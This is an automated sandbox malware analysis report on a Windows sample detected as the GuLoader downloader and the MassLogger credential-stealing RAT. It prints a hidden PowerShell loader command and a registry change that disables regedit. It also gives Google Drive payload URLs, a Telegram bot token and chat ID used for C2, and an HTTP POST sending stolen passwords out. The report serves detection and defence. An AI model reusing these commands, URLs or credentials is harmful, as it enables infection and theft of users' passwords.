Windows Analysis Report
dP5z8RpEyQ.exe

Overview

General Information

Sample name: dP5z8RpEyQ.exe (renamed because the original name is a hash value)
Original sample name: 57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1.exe
Analysis ID: 1576692
MD5: 307b33a50dcda8511f357c5de9da6b02
SHA1: ea0cd2a9546e4634ebd3cfe37fd73f5a8aabd0b8
SHA256: 57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1
Tags: exe, user-adrian__luca

Detection

GuLoader, MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disables CMD prompt
Disables the Windows registry editor (regedit)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • dP5z8RpEyQ.exe (PID: 2076 cmdline: "C:\Users\user\Desktop\dP5z8RpEyQ.exe" MD5: 307B33A50DCDA8511F357C5DE9DA6B02)
    • powershell.exe (PID: 2780 cmdline: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • reg.exe (PID: 616 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs", "Telegram Chatid": "7382809095"}
Source | Rule | Description | Author | Strings
00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: msiexec.exe PID: 5064 | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |

Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5064, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49813
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", CommandLine: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dP5z8RpEyQ.exe", ParentImage: C:\Users\user\Desktop\dP5z8RpEyQ.exe, ParentProcessId: 2076, ParentProcessName: dP5z8RpEyQ.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", ProcessId: 2780, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T12:06:29.129790+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49867 | 149.154.167.220 | 443 | TCP
2024-12-17T12:06:20.639801+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49834 | 193.122.130.0 | 80 | TCP
2024-12-17T12:06:26.702351+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49834 | 193.122.130.0 | 80 | TCP
2024-12-17T12:06:06.476206+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49813 | 172.217.19.174 | 443 | TCP

            AV Detection

Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs", "Telegram Chatid": "7382809095"}
Source: msiexec.exe.5064.6.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendMessage"}
Source: dP5z8RpEyQ.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: dP5z8RpEyQ.exe | Joe Sandbox ML: detected
Source: dP5z8RpEyQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: dP5z8RpEyQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb | source: powershell.exe, 00000002.00000002.2632708521.0000000007C83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbd | source: powershell.exe, 00000002.00000002.2638277451.0000000008D52000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_00406448 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_004027A1 FindFirstFileA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0327B319h 6_2_0327B068
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0327BBB8h 6_2_0327B7A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0327BBB8h 6_2_0327B790
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0327FA20h 6_2_0327F600
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 0327BBB8h 6_2_0327BAE6

            Networking

Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49867 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
  POST /bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd1e60f09a017a
  Host: api.telegram.org
  Content-Length: 1077
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49834 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49813 -> 172.217.19.174:443
Source: global traffic | HTTP traffic detected:
  GET /uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 4 times)
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: msiexec.exe, 00000006.00000002.3296654914.0000000023781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000006.00000002.3296654914.0000000023663000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2621900945.0000000003359000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft5or
Source: dP5z8RpEyQ.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: dP5z8RpEyQ.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBjq
Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.3295702142.0000000022C00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ
Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ%
Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJG
Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJU
Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJc
Source: msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/:
Source: msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/?
Source: msiexec.exe, 00000006.00000002.3284691137.00000000079E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.00000000079CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download
Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49867
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Windows\Superpraised
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Windows\Superpraised\haanlatterens
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Windows\SysWOW64\narrowness.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F3E260
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_03274338
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_0327B068
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_03279FB0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_0327A955
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_03272DD1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_0327B057
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_0327F600
Source: dP5z8RpEyQ.exe | Static PE information: invalid certificate
Source: dP5z8RpEyQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/13@4/4
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Users\user\AppData\Roaming\skittaget
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File created: C:\Users\user\AppData\Local\Temp\nsk1B92.tmp
Source: dP5z8RpEyQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, 00000006.00000002.3297750938.000000002461D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236D2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236DF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236AF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | File read: C:\Users\user\Desktop\dP5z8RpEyQ.exe
Source: unknown | Process created: C:\Users\user\Desktop\dP5z8RpEyQ.exe "C:\Users\user\Desktop\dP5z8RpEyQ.exe"
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeSection loaded: coremessaging.dllJump to behavior
